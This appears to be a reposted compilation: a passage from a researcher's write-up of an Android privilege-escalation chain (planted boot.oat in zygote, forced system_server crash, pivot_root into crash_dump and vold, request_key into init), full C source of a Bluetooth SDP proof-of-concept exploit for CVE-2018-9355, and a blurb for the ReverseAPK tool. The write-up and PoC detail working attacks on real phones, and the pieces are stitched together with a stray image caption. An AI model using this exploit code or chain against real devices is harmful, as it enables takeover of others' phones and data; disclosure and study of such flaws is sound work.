When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable/system partition; only the art file is actually stored on /data. But we can instead makesystem@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with__attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.

 

The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.

 

When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the «Unlock for all features and data» prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running «ls /sdcard» on the device.

 

This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.

 

Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn’t immediately fall over — while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.
After some experimentation, it turned out that Android’s code for tracking bandwidth usage has a safety check: If the network usage tracking code can’t write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.

 

To create a network connection, there are two options:

 

  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn’t work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

 

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you’d probably want to use an ethernet connection.

 

At this point, we can run arbitrary native code in zygote context and access user data; but we can’t yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would’ve been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we’ll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMINcapability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting theNO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:

 

  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 — which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn’t work if the root filesystem is a rootfs filesystem. This is the technique used here.

 

In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers/system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux labelu:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):

 

domain_auto_trans(domain, crash_dump_exec, crash_dump);

 

At the time this bug was reported, the crash_dump domain had the following SELinux policy:

 

[…]
allow crash_dump {
 domain
 -init
 -crash_dump
 -keystore
 -logd
}:process { ptrace signal sigchld sigstop sigkill };
[…]
r_dir_file(crash_dump, domain)
[…]

 

This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take overvold.

 

Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, andcrash_dump can’t use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code intocrash_dump64, it still wouldn’t be able to leverage that to attack system components because of the UID mismatch.

 

If you’ve been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn’t work because vold — very sensibly — hardcodes theMS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).

 

To inject code into crash_dump64, we can create a new mount namespace with unshare() (using ourCAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers ofcrash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.

 

At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android’s security policy considers us to have kernel-equivalent privileges; however, to see what you’d have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn’t look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:

 

domain_auto_trans(kernel, init_exec, init)

 

This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn’t mounted with MS_NOSUID, then our file will be executed in init context.

 

The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called «usermode helpers» that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, …) to userspace code. In particular, when a nonexistent key is looked up (e.g. viarequest_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.

 

Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then callrequest_key(), and the kernel invokes our request-key in init context.

 

The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):

 

domain_trans(init, { rootfs toolbox_exec }, modprobe)
domain_trans(init, vendor_toolbox_exec, vendor_modprobe)

 

modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:

 

allow modprobe self:capability sys_module;
allow modprobe { system_file }:system module_load;
allow vendor_modprobe self:capability sys_module;
allow vendor_modprobe { vendor_file }:system module_load;

 

Android nowadays doesn’t require signatures for kernel modules:

 

walleye:/ # zcat /proc/config.gz | grep MODULE
CONFIG_MODULES_USE_ELF_RELA=y
CONFIG_MODULES=y
# CONFIG_MODULE_FORCE_LOAD is not set
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y
CONFIG_MODULE_SRCVERSION_ALL=y
# CONFIG_MODULE_SIG is not set
# CONFIG_MODULE_COMPRESS is not set
CONFIG_MODULES_TREE_LOOKUP=y
CONFIG_ARM64_MODULE_CMODEL_LARGE=y
CONFIG_ARM64_MODULE_PLTS=y
CONFIG_RANDOMIZE_MODULE_REGION_FULL=y
CONFIG_DEBUG_SET_MODULE_RONX=y

 

Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.

Lessons learned

Notably, this attack crosses two weakly-enforced security boundaries: The boundary from blkid_untrusted tovold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote’s CAP_SYS_ADMINcapability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn’t, a security boundary — but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use — for example, as a development aid while stronger isolation is in development -, but they can also have negative effects by obfuscating how important a component is for the security of the overall system.

In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.

PoC for Android Bluetooth bug CVE-2018-9355

CVE-2018-9355 A-74016921 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1
Картинки по запросу Android Kernel CVE POC
/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

/** CVE-2018-9355
 *  https://source.android.com/security/bulletin/2018-06-01
 */

#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <pthread.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/sdp.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>


#define EIR_FLAGS                   0x01  /* flags */
#define EIR_NAME_COMPLETE           0x09  /* complete local name */
#define EIR_LIM_DISC                0x01 /* LE Limited Discoverable Mode */
#define EIR_GEN_DISC                0x02 /* LE General Discoverable Mode */

#define DATA_ELE_SEQ_DESC_TYPE 6
#define UINT_DESC_TYPE 1


#define SIZE_SIXTEEN_BYTES 4
#define SIZE_EIGHT_BYTES 3
#define SIZE_FOUR_BYTES 2
#define SIZE_TWO_BYTES 1
#define SIZE_ONE_BYTE 0
#define SIZE_IN_NEXT_WORD 6
#define TWO_COMP_INT_DESC_TYPE 2
#define UUID_DESC_TYPE 3
#define ATTR_ID_SERVICE_ID 0x0003

static int count = 0;
static int do_continuation;

static int init_server(uint16_t mtu)
{
	struct l2cap_options opts;
	struct sockaddr_l2 l2addr;
	socklen_t optlen;
	int l2cap_sock;

	/* Create L2CAP socket */
	l2cap_sock = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
	if (l2cap_sock < 0) {
		printf("opening L2CAP socket: %s", strerror(errno));
		return -1;
	}

	memset(&l2addr, 0, sizeof(l2addr));
	l2addr.l2_family = AF_BLUETOOTH;
	bacpy(&l2addr.l2_bdaddr, BDADDR_ANY);
	l2addr.l2_psm = htobs(SDP_PSM);

	if (bind(l2cap_sock, (struct sockaddr *) &l2addr, sizeof(l2addr)) < 0) {
		printf("binding L2CAP socket: %s", strerror(errno));
		return -1;
	}

	int opt = L2CAP_LM_MASTER;
	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_LM, &opt, sizeof(opt)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	memset(&opts, 0, sizeof(opts));
	optlen = sizeof(opts);

	if (getsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, &optlen) < 0) {
		printf("getsockopt: %s", strerror(errno));
		return -1;
	}
	opts.omtu = mtu;
	opts.imtu = mtu;

	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	if (listen(l2cap_sock, 5) < 0) {
	  printf("listen: %s", strerror(errno));
	  return -1;
	}

	return l2cap_sock;
}

static int process_service_search_req(uint8_t *pkt)
{
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;


	/* Total Handles */
	bt_put_be16(400, pkt); pkt += 2;
	bt_put_be16(400, pkt); pkt += 2;

	/* and that's it! */
	/* TODO: Can we do some heap grooming to make sure we don't get a continuation? */

	//bt_put_be16((pkt - start) - 2, lenloc);
	return pkt - start;
}

static uint8_t *place_uid(uint8_t *pkt, int o)
{
	int i;
	for (i = 0; i < 16; i++)
		*pkt++ = 0x16 + (i + o);
	return pkt;

}

static size_t flood_u128s(uint8_t *pkt)
{
	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	size_t retsize = 0;

	bt_put_be16(9, pkt);pkt += 2;

	if (do_continuation == 1) {
		*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
		*pkt |= SIZE_IN_NEXT_WORD;
		pkt++;
		start = pkt;
		pkt += 2;
	}

	//*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	//pkt++;

	for (i = 0; i < 31; i++) {
		*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
		pkt++;

		*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
		pkt++;
		/* Attr ID */
		bt_put_be16(ATTR_ID_SERVICE_ID, pkt); pkt += 2;

		*pkt = (UUID_DESC_TYPE << 3) | SIZE_SIXTEEN_BYTES;
		pkt++;
		pkt = place_uid(pkt, i);
	}
	/* Set the continuation */
	if (do_continuation) {
		bt_put_be16(654, lenloc);
		bt_put_be16(651 * 2, start);
		*pkt = 1;
		retsize = 658;
	}
	else {
		bt_put_be16(651, lenloc);
		//bt_put_be16(648, start);
		*pkt = 0;
		retsize = 654;
	}
	//	bt_put_be16((pkt - lenloc) + 10, lenloc);
	//	bt_put_be16((pkt - start) + 10, start);
	printf("%s: size is pkt - lenloc %zu and pkt is 0x%02x\n", __func__, pkt - lenloc, *pkt);
	pkt++;

	return retsize;

}

static size_t do_fake_svcsar(uint8_t *pkt)
{

	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	/* Id and length -- ignored in the code */
	//bt_put_be16(0, pkt);pkt += 2;
	//bt_put_be16(0xABCD, pkt);pkt += 2;
	/* list byte count */
	bt_put_be16(9, pkt);pkt += 2;

	*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
	*pkt |= SIZE_EIGHT_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
	pkt++;
	/* Attr ID */
	bt_put_be16(0x0100, pkt); pkt += 2;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	/* Set the continuation */
	if (do_continuation)
		*pkt = 1;
	else
		*pkt = 1;
	pkt++;

	/* Place the size... */
	//bt_put_be16((pkt - start) - 2, lenloc);

	printf("%zu\n", pkt-start);
	return (size_t) (pkt - start);
}

static void process_request(uint8_t *buf, int fd)
{
	sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *) buf;
	sdp_pdu_hdr_t *rsphdr;
	uint8_t *rsp = malloc(65535);
	int status = SDP_INVALID_SYNTAX;
	int send_size = 0;

	memset(rsp, 0, 65535);
	rsphdr = (sdp_pdu_hdr_t *)rsp;
	rsphdr->tid = reqhdr->tid;

	switch (reqhdr->pdu_id) {
	case SDP_SVC_SEARCH_REQ:
		printf("Got a svc srch req\n");
		send_size = process_service_search_req(rsp + sizeof(sdp_pdu_hdr_t));
		rsphdr->pdu_id = SDP_SVC_SEARCH_RSP;
		rsphdr->plen = htons(send_size);
		break;
	case SDP_SVC_ATTR_REQ:
		printf("Got a svc attr req\n");
		//status = service_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_ATTR_RSP;
		break;
	case SDP_SVC_SEARCH_ATTR_REQ:
		printf("Got a svc srch attr req\n");
		//status = service_search_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_SEARCH_ATTR_RSP;
		send_size = flood_u128s(rsp + sizeof(sdp_pdu_hdr_t));
		//do_fake_svcsar(rsp + sizeof(sdp_pdu_hdr_t)) + 3;
		rsphdr->plen = htons(send_size);
		break;
	default:
		printf("Unknown PDU ID : 0x%x received", reqhdr->pdu_id);
		status = SDP_INVALID_SYNTAX;
		break;
	}
	printf("%s: sending %zu\n", __func__, send_size + sizeof(sdp_pdu_hdr_t));
	send(fd, rsp, send_size + sizeof(sdp_pdu_hdr_t), 0);
	free(rsp);
}


static void *l2cap_data_thread(void *input)
{
	int fd = *(int *)input;
	sdp_pdu_hdr_t hdr;
	uint8_t *buf;
	int len, size;

	while (true) {
		len = recv(fd, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK);
		if (len < 0 || (unsigned int) len < sizeof(sdp_pdu_hdr_t)) {
			continue;
		}

		size = sizeof(sdp_pdu_hdr_t) + ntohs(hdr.plen);
		buf = malloc(size);
		if (!buf)
			continue;

		printf("%s: trying to recv %d\n", __func__, size);
		len = recv(fd, buf, size, 0);
		if (len <= 0) {
			free(buf);
			continue;
		}

		if (!count) {
			process_request(buf, fd);
			count ++;
		}
		if (count >= 1) {
			do_continuation = 0;
			process_request(buf, fd);
			count++;
		}

		free(buf);
	}
}

/* derived from hciconfig.c */
static void *advertiser(void *unused)
{
	uint8_t status;
	int device_id, handle;
	struct hci_request req = { 0 };
	le_set_advertise_enable_cp acp = { 0 };
	le_set_advertising_parameters_cp avc = { 0 };
	le_set_advertising_data_cp data = { 0 };

	device_id = hci_get_route(NULL);

	if (device_id < 0) {
		printf("%s: Failed to get route: %s\n", __func__, strerror(errno));
		return NULL;
	}
	handle = hci_open_dev(hci_get_route(NULL));
	if (handle < 0) {
		printf("%s: Failed to open and aquire handle: %s\n", __func__, strerror(errno));
		return NULL;
	}

	avc.min_interval = avc.max_interval = htobs(150);
	avc.chan_map = 7;
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_PARAMETERS;
	req.cparam = &avc;
	req.clen = LE_SET_ADVERTISING_PARAMETERS_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISE_ENABLE;
	req.cparam = &acp;
	req.clen = LE_SET_ADVERTISE_ENABLE_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	data.data[0] = htobs(2);
	data.data[1] = htobs(EIR_FLAGS);
	data.data[2] = htobs(EIR_GEN_DISC | EIR_LIM_DISC);

	data.data[3] = htobs(6);
	data.data[4] = htobs(EIR_NAME_COMPLETE);
	data.data[5] = 'D';
	data.data[6] = 'L';
	data.data[7] = 'E';
	data.data[8] = 'A';
	data.data[9] = 'K';

	data.length = 10;

	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_DATA;
	req.cparam = &data;
	req.clen = LE_SET_ADVERTISING_DATA_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	printf("Device should be advertising under DLEAK\n");
}



int main(int argc, char **argv)
{
	pthread_t *io_channel;
	pthread_t adv;
	int       fds[16];
	const int io_chans = 16;
	struct sockaddr_l2 addr;
	socklen_t qlen = sizeof(addr);
	socklen_t len = sizeof(addr);
	int l2cap_sock;
	int i;


	pthread_create(&adv, NULL, advertiser, NULL);
	l2cap_sock = init_server(652);
	if (l2cap_sock < 0)
		return EXIT_FAILURE;

	io_channel = malloc(io_chans * sizeof(*io_channel));
	if (!io_channel)
		return EXIT_FAILURE;

	do_continuation = 1;
	for (i = 0; i < io_chans; i++) {
		printf("%s: Going to accept on io chan %d\n", __func__, i);
		fds[i] = accept(l2cap_sock, (struct sockaddr *) &addr, &len);
		if (fds[i] < 0) {
			i--;
			printf("%s: Accept failed with %s\n", __func__, strerror(errno));
			continue;
		}
		printf("%s: accepted\n", __func__);
		pthread_create(&io_channel[i], NULL, l2cap_data_thread, &fds[i]);
	}
}

ReverseAPK — Quickly Analyze And Reverse Engineer Android Packages

Quickly analyze and reverse engineer Android applications.

FEATURES:

  • Displays all extracted files for easy reference
  • Automatically decompile APK files to Java and Smali format
  • Analyze AndroidManifest.xml for common vulnerabilities and behavior
  • Static source code analysis for common vulnerabilities and behavior
    • Device info
    • Intents
    • Command execution
    • SQLite references
    • Logging references
    • Content providers
    • Broadcast recievers
    • Service references
    • File references
    • Crypto references
    • Hardcoded secrets
    • URL’s
    • Network connections
    • SSL references
    • WebView references

INSTALL:

./install

USAGE:

reverse-apk <apk_name>